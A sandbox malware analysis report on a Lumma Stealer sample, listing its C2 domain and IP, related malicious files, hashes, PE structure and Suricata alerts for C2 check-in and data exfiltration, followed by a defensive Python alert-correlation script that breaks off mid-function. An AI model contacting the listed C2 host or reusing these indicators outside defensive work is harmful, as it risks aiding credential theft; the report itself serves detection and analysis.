https://ac.ecosia.org/autocomplete?q= | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/Y | onaUtwpiyq.exe, 00000000.00000003.1405319597.0000000000773000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.micro | onaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/CCf | onaUtwpiyq.exe, 00000000.00000003.1451952470.00000000053D2000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1452186757.00000000053D2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/rs | onaUtwpiyq.exe, 00000000.00000003.1506033237.0000000000803000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta | onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/L | onaUtwpiyq.exe, 00000000.00000003.1559590194.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.11.101 | mindhandru.buzz | United States | | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581242
Start date and time: 2024-12-27 09:00:59 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: onaUtwpiyq.exe
renamed because original name is a hash value
Original Sample Name: 7c96eee8e62caedad10358116f0b8024.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target onaUtwpiyq.exe, PID 3784 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:01:54 | API Interceptor | 8x Sleep call for process: onaUtwpiyq.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.11.101 | ZvHSpovhDw.exe | malicious | LummaC |
104.21.11.101 | 8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT |
104.21.11.101 | ARoqFi68Nr.exe | malicious | LummaC |
104.21.11.101 | DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar |
104.21.11.101 | Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc |
104.21.11.101 | IERiUft8Wi.exe | malicious | LummaC |
104.21.11.101 | zi042476Iv.exe | malicious | LummaC |
104.21.11.101 | C8FtVPhuxd.exe | malicious | LummaC |
104.21.11.101 | 0zBsv1tnt4.exe | malicious | LummaC |
104.21.11.101 | cqHMm0ykDG.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mindhandru.buzz | fer4JIJGeL.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | AaEBZ7icLd.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | wJtkC63Spw.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | cFLK1CiiNK.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
mindhandru.buzz | 8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
mindhandru.buzz | ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
mindhandru.buzz | Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
mindhandru.buzz | PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
mindhandru.buzz | 7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
s-part-0035.t-0009.t-msedge.net | wJtkC63Spw.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | qZA8AyGxiA.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | ZvHSpovhDw.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 60Zxcx88Uv.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 7jKx8dPOEs.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 1fi2LiofgW.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | zi042476Iv.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 54861 Proforma Invoice AMC2273745.xlam.xlsx | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | TAX INVOICE - NBO2506000632.xlam.xlsx | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | installer.bat | malicious | Vidar | 13.107.246.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | fer4JIJGeL.exe | malicious | LummaC | 172.67.165.185
CLOUDFLARENETUS | AaEBZ7icLd.exe | malicious | LummaC | 172.67.165.185
CLOUDFLARENETUS | wJtkC63Spw.exe | malicious | LummaC | 172.67.165.185
CLOUDFLARENETUS | cFLK1CiiNK.exe | malicious | LummaC | 172.67.165.185
CLOUDFLARENETUS | ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
CLOUDFLARENETUS | 8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
CLOUDFLARENETUS | ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
CLOUDFLARENETUS | DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar | 104.21.11.101
CLOUDFLARENETUS | Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
CLOUDFLARENETUS | PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | fer4JIJGeL.exe | malicious | LummaC | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | AaEBZ7icLd.exe | malicious | LummaC | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | wJtkC63Spw.exe | malicious | LummaC | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | cFLK1CiiNK.exe | malicious | LummaC | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | 8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | PH1D3KHmOD.exe | malicious | LummaC | 104.21.11.101
a0e9f5d64349fb13191bc781f81f42e1 | 7jKx8dPOEs.exe | malicious | LummaC | 104.21.11.101
                                                                                                              No context
                                                                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94535411637488
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: onaUtwpiyq.exe
File size: 1'869'312 bytes
MD5: 7c96eee8e62caedad10358116f0b8024
SHA1: 1816e4f69b7bf7e9b8a2a04ab5d0694896284357
SHA256: ca2141db806dcfd4769d08d2bfa07449353fb1137d1aa3664f9afbd8e506d7b1
SHA512: 9be858e287fa3e34c5a3acaf1efde16c1c54b501ad27e0c47eb5f1db9e9b88bac7e3f78be75030e3613c3d4b95bbde7d2aa2006f7dc2882cad41113f48debf51
SSDEEP: 49152:ZtCGvxI8oyKYHik8HIXSmy46qH20eN5aub76a:7CGa8YBobnR2dH3
TLSH: B485335D7C5B9CBBD06AA03125B30F87E9C2111C349F7B770A6B5293227B114AEE948F
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................I...........@...........................I...........@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x89b000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                                                              Instruction
                                                                                                              jmp 00007FF3D0F9048Ah
                                                                                                              pcmpgtb mm3, qword ptr [eax+eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              jmp 00007FF3D0F92485h
                                                                                                              add byte ptr [edi], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], dh
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [edx], ah
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ecx], al
                                                                                                              add byte ptr [eax], 00000000h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              pop es
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x52000 | 0x26400 | eb5d105b3b6fe106c94a95a576b2a3dc | False | 0.9996680964052288 | data | 7.984613246074543 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x55000 | 0x2a6000 | 0x200 | d26ae836bf754c464248f68c8d457905 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
asctzxyj | 0x2fb000 | 0x19f000 | 0x19e400 | 598922d1632166a637e91eede4a4f14d | False | 0.994520759467411 | data | 7.953040311099013 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cphljqds | 0x49a000 | 0x1000 | 0x600 | 8b879990a17d041f800ed69c8130e7f1 | False | 0.5403645833333334 | data | 4.756450832050239 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x49b000 | 0x3000 | 0x2200 | 445c658244a7959d2a05c7039431776b | False | 0.07663143382352941 | DOS executable (COM) | 0.7675111198172956 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T09:01:54.542493+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49712 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:55.271561+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49712 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:55.271561+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49712 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:56.513604+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49718 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:57.379739+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.9 | 49718 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:57.379739+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49718 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:59.055245+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49724 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:01.352480+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49730 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:03.785693+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49736 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:06.688005+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49742 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:07.587181+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49742 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:09.428663+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49749 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:09.432641+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.9 | 49749 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:12.999874+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49760 | 104.21.11.101 | 443 | TCP
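Every TLS connection in the table trips the severity-3 JA3 fingerprint rule (SID 2028371), but only four of the eight client ports go on to match a severity-1 Lumma C2, check-in or exfiltration signature; the other four carry the fingerprint match alone. A JA3 hit by itself is weak evidence (the fingerprint is shared by many clients), so the useful detection is the escalation from fingerprint to confirmed signature on the same 4-tuple. The script below is an added example, not Joe Sandbox output: it parses alerts in Suricata's fast.log layout, groups them by flow and reports the escalated flows with the delay between the first fingerprint hit and the last hard alert. SAMPLE_LOG is constructed from the rows of the table above; its rev numbers and Classification strings are placeholders, and the dict keys it produces are this example's own, not Suricata's EVE schema.

```python
"""Correlating Suricata alerts per TCP flow.

Added example; not part of the Joe Sandbox report. Parses fast.log-style alert
lines, groups them by (src, sport, dst, dport) and reports flows that escalated
from a TLS-fingerprint rule to a priority-1 malware signature. SAMPLE_LOG is
constructed from the alert table above; rev and Classification fields are
placeholders.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

SAMPLE_LOG = """\
12/27/2024-09:01:54.542493  [**] [1:2028371:1] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 192.168.2.9:49712 -> 104.21.11.101:443
12/27/2024-09:01:55.271561  [**] [1:2049836:1] ET MALWARE Lumma Stealer Related Activity [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49712 -> 104.21.11.101:443
12/27/2024-09:01:55.271561  [**] [1:2054653:1] ET MALWARE Lumma Stealer CnC Host Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49712 -> 104.21.11.101:443
12/27/2024-09:01:56.513604  [**] [1:2028371:1] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 192.168.2.9:49718 -> 104.21.11.101:443
12/27/2024-09:01:57.379739  [**] [1:2049812:1] ET MALWARE Lumma Stealer Related Activity M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49718 -> 104.21.11.101:443
12/27/2024-09:01:57.379739  [**] [1:2054653:1] ET MALWARE Lumma Stealer CnC Host Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49718 -> 104.21.11.101:443
12/27/2024-09:01:59.055245  [**] [1:2028371:1] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 192.168.2.9:49724 -> 104.21.11.101:443
12/27/2024-09:02:01.352480  [**] [1:2028371:1] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 192.168.2.9:49730 -> 104.21.11.101:443
12/27/2024-09:02:03.785693  [**] [1:2028371:1] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 192.168.2.9:49736 -> 104.21.11.101:443
12/27/2024-09:02:06.688005  [**] [1:2028371:1] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 192.168.2.9:49742 -> 104.21.11.101:443
12/27/2024-09:02:07.587181  [**] [1:2048094:1] ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49742 -> 104.21.11.101:443
12/27/2024-09:02:09.428663  [**] [1:2028371:1] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 192.168.2.9:49749 -> 104.21.11.101:443
12/27/2024-09:02:09.432641  [**] [1:2843864:1] ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49749 -> 104.21.11.101:443
12/27/2024-09:02:12.999874  [**] [1:2028371:1] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 192.168.2.9:49760 -> 104.21.11.101:443
"""

# fast.log layout: TIME  [**] [gid:sid:rev] MSG [**] [Classification: X] [Priority: N] {PROTO} SRC:PORT -> DST:PORT
FAST_LOG = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d{1,6})\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>[A-Za-z0-9]+)\}\s+(?P<src>\S+?):(?P<sport>\d+)\s+->\s+(?P<dst>\S+?):(?P<dport>\d+)\s*$"
)
FINGERPRINT_SIDS = {2028371}   # TLS fingerprint rules: suggestive on their own, not conclusive


def parse_fast_log(text):
    """Parse fast.log lines into dicts; lines that do not match the layout are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_LOG.match(line)
        if not m:
            continue
        d = m.groupdict()
        alerts.append({
            "ts": datetime.strptime(d["ts"], "%m/%d/%Y-%H:%M:%S.%f"),
            "sid": int(d["sid"]), "msg": d["msg"], "priority": int(d["prio"]), "proto": d["proto"],
            "flow": (d["src"], int(d["sport"]), d["dst"], int(d["dport"])),
        })
    return alerts


def group_by_flow(alerts):
    """Map each 4-tuple to its alerts in time order."""
    flows = defaultdict(list)
    for a in alerts:
        flows[a["flow"]].append(a)
    for lst in flows.values():
        lst.sort(key=lambda a: a["ts"])
    return dict(flows)


def escalated_flows(alerts):
    """Flows where a fingerprint hit is followed by a priority-1 alert: (flow, hard SIDs, seconds)."""
    out = []
    for flow, lst in group_by_flow(alerts).items():
        fp = [a for a in lst if a["sid"] in FINGERPRINT_SIDS]
        hard = [a for a in lst if a["priority"] == 1 and a["sid"] not in FINGERPRINT_SIDS]
        if fp and hard and hard[-1]["ts"] >= fp[0]["ts"]:
            delay = (hard[-1]["ts"] - fp[0]["ts"]).total_seconds()
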